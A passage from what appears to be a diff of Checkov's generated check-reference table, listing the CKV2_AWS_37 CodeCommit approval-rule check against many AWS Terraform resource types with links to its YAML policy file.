[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 965 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 966 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 967 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 968 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 969 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 970 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 971 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 972 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 973 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 974 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 975 | CKV2_AWS_37 | resource | aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 976 | CKV2_AWS_37 | resource | aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 977 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 978 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 979 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 980 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 981 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 982 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 983 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 984 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 985 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 986 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 987 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 988 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 989 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 990 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 991 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 992 | CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 993 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 994 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 995 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 996 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 997 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 998 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 999 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1000 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1001 | CKV2_AWS_37 | resource | aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1002 | CKV2_AWS_37 | resource | aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1003 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1004 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1005 | CKV2_AWS_37 | resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1006 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1007 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1008 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1009 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1010 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1011 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1012 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1013 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1014 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1015 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1016 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1017 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1018 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1019 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1020 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1021 | CKV2_AWS_37 | resource | aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1022 | CKV2_AWS_37 | resource | aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1023 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1024 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1025 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1026 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1027 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1028 | CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1029 | CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1030 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1031 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1032 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1033 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1034 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1035 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1036 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1037 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1038 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1039 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1040 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1041 | CKV2_AWS_37 | resource | aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1042 | CKV2_AWS_37 | resource | aws_dms_replication_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1043 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1044 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1045 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1046 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1047 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1048 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1049 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1050 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1051 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1052 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1053 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1054 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1055 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1056 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1057 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1058 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1059 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1060 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1061 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1062 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1063 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1064 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1065 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1066 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1067 | CKV2_AWS_37 | resource | aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1068 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1069 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure 